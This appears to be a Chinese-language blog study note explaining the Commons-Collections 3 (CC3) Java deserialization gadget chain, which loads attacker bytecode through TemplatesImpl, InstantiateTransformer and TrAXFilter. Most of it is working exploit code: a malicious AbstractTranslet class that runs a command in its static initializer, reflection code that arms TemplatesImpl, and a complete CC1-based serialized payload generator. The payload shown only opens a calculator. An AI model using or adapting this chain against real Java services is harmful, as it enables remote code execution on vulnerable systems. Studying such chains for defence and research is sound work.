CC3学习记录
🌸 CC3
之前学习到的cc1和cc6都是通过Runtime进行命令执行的,如果Runtime被加入黑名单的话,整个链子也就失效了。而cc3则是通过动态类加载机制进行任意代码执行的。
🌸 版本限制
JDK版本:8u65
Commons-Collections版本:3.2.1
🌸 动态类加载机制
之前学习过动态类加载机制:ClassLoader中的loadClass方法负责加载,而loadClass中会通过调用defineClass方法从字节中加载一个类。
ClassLoader.loadClass()->ClassLoader.findClass()->ClassLoader.defineClass()
但是这个过程中只进行类加载,并不会进行初始化,所以我们应该找到初始化的地方。
🌸 CC链分析
通过defineClass方法,继续向上找谁调用了defineClass方法。
于是我们在com.sun.org.apache.xalan.internal.xsltc.trax中的TemplatesImpl类中的静态类TransletClassLoader中发现了defineClass方法,他是默认的类型,也就是default类型,只能是在他自己的类中使用。
继续Find Usage:
于是我们在defineTransletClasses方法中找到了调用的地方。更完整的代码如下:
private void defineTransletClasses()
throws TransformerConfigurationException {
if (_bytecodes == null) {
ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
throw new TransformerConfigurationException(err.toString());
}
TransletClassLoader loader = (TransletClassLoader)
AccessController.doPrivileged(new PrivilegedAction() {
public Object run() {
return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
}
});
try {
final int classCount = _bytecodes.length;
_class = new Class[classCount];
if (classCount > 1) {
_auxClasses = new HashMap<>();
}
for (int i = 0; i < classCount; i++) {
_class[i] = loader.defineClass(_bytecodes[i]);
final Class superClass = _class[i].getSuperclass();
// Check if this is the main class
if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
_transletIndex = i;
}
else {
_auxClasses.put(_class[i].getName(), _class[i]);
}
}
if (_transletIndex < 0) {
ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
throw new TransformerConfigurationException(err.toString());
}
}
catch (ClassFormatError e) {
ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name);
throw new TransformerConfigurationException(err.toString());
}
catch (LinkageError e) {
ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
throw new TransformerConfigurationException(err.toString());
}
}接下来分析上面的代码:defineTransletClasses类是private属性修饰的,同时这个代码中有一个if (_bytecodes == null)条件,要想继续向下执行我们的目标代码:_class[i] = loader.defineClass(_bytecodes[i]);肯定是要将这个if条件满足的。
if (_bytecodes == null)条件必须要满足:_bytecodes不为空,不然的话就抛异常了!return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());这个代码中,有一个_tfactory变量,必须要给他赋值,不然的话就会出现空指针异常了。
继续向上找谁调用了defineTransletClasses方法。
于是我们找到了三个地方!三个方法的具体代码如下:
private synchronized Class[] getTransletClasses() {
try {
if (_class == null) defineTransletClasses();
}
catch (TransformerConfigurationException e) {
// Falls through
}
return _class;
}在这个getTransletClasses方法中,同样也是private修饰的。
public synchronized int getTransletIndex() {
try {
if (_class == null) defineTransletClasses();
}
catch (TransformerConfigurationException e) {
// Falls through
}
return _transletIndex;
}getTransletIndex方法是public修饰的。
private Translet getTransletInstance()
throws TransformerConfigurationException {
try {
if (_name == null) return null;
if (_class == null) defineTransletClasses();
// The translet needs to keep a reference to all its auxiliary
// class to prevent the GC from collecting them
AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();
translet.postInitialization();
translet.setTemplates(this);
translet.setServicesMechnism(_useServicesMechanism);
translet.setAllowedProtocols(_accessExternalStylesheet);
if (_auxClasses != null) {
translet.setAuxiliaryClasses(_auxClasses);
}
return translet;
}
catch (InstantiationException e) {
ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
throw new TransformerConfigurationException(err.toString());
}
catch (IllegalAccessException e) {
ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
throw new TransformerConfigurationException(err.toString());
}
}getTransletInstance方法虽然是private方法修饰的,但是我们找到代码中很重要的初始化过程:AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();这里将加载的class进行了实例化,也就是做了初始化的过程!因为我们就是要执行代码!就是要找到实例化的地方,然而这个方法刚好是满足的!对获取到的_class进行了初始化!这里还是出现了一个条件:if (_name == null) return null;_name变量肯定不能为空!不然return null了
继续向上找谁调用了getTransletInstance方法!
于是找到了当前类下面的newTransformer方法中,调用了getTransletInstance方法!在这里我们就找到了一个公开的方法。于是开始尝试利用!
🍂 TemplatesImpl类分析和利用
这里发现该类的构造器是空的!
public TemplatesImpl() { }同时我们还要满足上面所说的几个条件:
_name不为空,不然的话return null!
那就通过反射进行修改:(private属性修饰,所以需要设置可访问)
TemplatesImpl templates = new TemplatesImpl();
Class<? extends TemplatesImpl> templatesClass = templates.getClass();
Field nameFeild = templatesClass.getDeclaredField("_name");
nameFeild.setAccessible(true);
nameFeild.set(templates,"aaa");_bytecodes不为空,不然的话就抛异常了!
这里发现_bytecodes变量是一个二维数组!他的具体的值应该是什么,我们跟进到方法里面去细看:
我们这里发现调用的就是loader.defineClass(_bytecodes[i]),继续跟进发现穿进去的其实是byte[] b是一个一维的数组!
那我们就把_bytecodes里面设置为一个一维数组,再包裹一下就好啦。
Field declaredField = templatesClass.getDeclaredField("_bytecodes");
declaredField.setAccessible(true);
byte[] code = Files.readAllBytes(Paths.get("D:\\tmp\\Test.class"));
byte[][] codes = {code};
declaredField.set(templates,codes);_tfactory变量,必须要给他赋值,不然的话就会出现空指针异常。
private transient TransformerFactoryImpl _tfactory = null;定位到_tfactory变量的定义地方,发现该变量不仅仅是private,而且还是transient,既然是transient修饰的,那么这个变量是不能序列化的!(在序列化的时候,该变量根本就不会传进去),同时这个变量的类型是TransformerFactoryImpl。直接实例化一个传进去!
//修改_tfactory变量
Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
tfactoryField.setAccessible(true);
tfactoryField.set(templates,new TransformerFactoryImpl());现在写一个Test类,用于加载,并执行代码:
import java.io.IOException;
public class Test {
static {
try {
Runtime.getRuntime().exec("calc");
} catch (IOException e) {
throw new RuntimeException(e);
}
}
}但是当我们执行代码的时候,发现报错了!是空指针异常的错误。
调试,尝试找到原因:
下断点在这里,进行调试:
经过不断的调试,发现在如下的代码中出现了空指针异常:
for (int i = 0; i < classCount; i++) {
_class[i] = loader.defineClass(_bytecodes[i]);
final Class superClass = _class[i].getSuperclass();
// Check if this is the main class
if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
_transletIndex = i;
}
else {
_auxClasses.put(_class[i].getName(), _class[i]);
}
}
if (_transletIndex < 0) {
ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
throw new TransformerConfigurationException(err.toString());
}在上述代码中,_auxClasses为空,导致出现了空指针异常。这里有两种方法:
superClass.getName().equals(ABSTRACT_TRANSLET)这个条件为true的话,那就不会进入下面的else,也就不会出现空指针异常啦!_auxClasses赋值,同样也是不会出现空指针异常!
但是当继续往下看代码的时候,发现其实第二种方式不可取,代码如下:
if (_transletIndex < 0) {
ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
throw new TransformerConfigurationException(err.toString());
}这个代码中通过判断变量_transletIndex是不是小于0,如果是的话,就会报错~ 然而在上面的调试过程图中发现,当执行else的时候,变量_transletIndex就是-1,那么下面的if条件也就满足啦!所以就会报错了。
所以我们只能采用第一种方式,尝试去满足superClass.getName().equals(ABSTRACT_TRANSLET),这样的话成功的进入第一个if条件里面,从而使得_transletIndex = i。
跟进到常量ABSTRACT_TRANSLET,发现了他的结果:
private static String ABSTRACT_TRANSLET
= "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";所以我们写的Test类应该要继承上面的这个类!所以重写Test类:
import java.io.IOException;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
public class Test extends AbstractTranslet{
static {
try {
Runtime.getRuntime().exec("calc");
} catch (IOException e) {
throw new RuntimeException(e);
}
}
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
}因为AbstractTranslet类是一个抽象的类,所以需要去实现它的方法。
这里再次编译Test.java。再次执行代码:
成功弹出计算器!
🍂 TrAXFilter类分析和利用
由于上面的代码是通过newTransformer方法执行的,所以我们这里尝试继续向上找调用点:
所以我们这里就找到了一个类TrAXFilter,源码如下:
刚好是在TrAXFilter类中的构造器中调用的!但是TrAXFilter类是没有继承Serializable接口,所以是不能够进行序列化的。
但是cc3的作者发现了一个专门可以通过反射类动态创建对象的类InstantiateTransformer,我们查看这个类的构造器等代码:
public InstantiateTransformer(Class[] paramTypes, Object[] args) {
super();
iParamTypes = paramTypes;
iArgs = args;
}有参的构造器需要传入的是Class数组类型的参数类型,和Object数组类型的参数。然后关注到该类中的transform方法:
public Object transform(Object input) {
try {
if (input instanceof Class == false) {
throw new FunctorException(
"InstantiateTransformer: Input object was not an instanceof Class, it was a "
+ (input == null ? "null object" : input.getClass().getName()));
}
Constructor con = ((Class) input).getConstructor(iParamTypes);
return con.newInstance(iArgs);
} catch (NoSuchMethodException ex) {
throw new FunctorException("InstantiateTransformer: The constructor must exist and be public ");
} catch (InstantiationException ex) {
throw new FunctorException("InstantiateTransformer: InstantiationException", ex);
} catch (IllegalAccessException ex) {
throw new FunctorException("InstantiateTransformer: Constructor must be public", ex);
} catch (InvocationTargetException ex) {
throw new FunctorException("InstantiateTransformer: Constructor threw an exception", ex);
}
}在这个代码中:通过反射获取class,然后((Class) input).getConstructor(iParamTypes);获取构造器,并将参数传递进去,然后返回一个Object。
因为我们要通过TrAXFilter的构造器来创建TrAXFilter对象,所以iParamTypes就是构造器参数的类型,iArgs就是传进去的参数!而transform方法的Object input就是TrAXFilter.class,用于获取class。
因此最终的TrAXFilter类的利用代码如下
package org.y4y17;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.functors.InstantiateTransformer;
import javax.xml.transform.Templates;
import javax.xml.transform.TransformerConfigurationException;
import java.io.IOException;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
public class cc3 {
public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, TransformerConfigurationException {
TemplatesImpl templates = new TemplatesImpl();
Class<? extends TemplatesImpl> templatesClass = templates.getClass();
Field nameFeild = templatesClass.getDeclaredField("_name");
nameFeild.setAccessible(true);
nameFeild.set(templates,"aaa");
Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
bytecodesField.setAccessible(true);
byte[] code = Files.readAllBytes(Paths.get("D:\\tmp\\Test.class"));
byte[][] codes = {code};
bytecodesField.set(templates,codes);
//修改_tfactory变量
Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
tfactoryField.setAccessible(true);
tfactoryField.set(templates,new TransformerFactoryImpl());
// templates.newTransformer();
InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
//下面回去调用transform方法,这里需要传入参数的Object input,这里的input就是TrAXFilter类的对象
instantiateTransformer.transform(TrAXFilter.class);
}
}🍂 CC1+TrAXFilter利用
最终的利用代码:
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import javax.xml.transform.Templates;
import javax.xml.transform.TransformerConfigurationException;
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;
public class cc3 {
public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, TransformerConfigurationException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
TemplatesImpl templates = new TemplatesImpl();
Class<? extends TemplatesImpl> templatesClass = templates.getClass();
Field nameFeild = templatesClass.getDeclaredField("_name");
nameFeild.setAccessible(true);
nameFeild.set(templates,"aaa");
Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
bytecodesField.setAccessible(true);
byte[] code = Files.readAllBytes(Paths.get("C:\\tmp\\Test.class"));
byte[][] codes = {code};
bytecodesField.set(templates,codes);
//修改_tfactory变量
Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
tfactoryField.setAccessible(true);
tfactoryField.set(templates,new TransformerFactoryImpl());
// templates.newTransformer();
InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
//下面回去调用transform方法,这里需要传入参数的Object input,这里的input就是TrAXFilter类的对象
// instantiateTransformer.transform(TrAXFilter.class);
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(TrAXFilter.class),
instantiateTransformer
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<String, Object> map = new HashMap<>();
map.put("value","aaa");
Map<String,Object> transformedMap = TransformedMap.decorate(map, null, chainedTransformer);
Class<?> aClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor<?> anntationInvocationHandlerConstructor = aClass.getDeclaredConstructor(Class.class, Map.class);
anntationInvocationHandlerConstructor.setAccessible(true);
Object o = anntationInvocationHandlerConstructor.newInstance(Target.class, transformedMap);
// serialization(o);
deserialization();
}
public static void serialization(Object o) throws IOException {
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("cc3.bin"));
objectOutputStream.writeObject(o);
objectOutputStream.close();
}
public static void deserialization() throws IOException, ClassNotFoundException {
ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("cc3.bin"));
objectInputStream.readObject();
objectInputStream.close();
}
}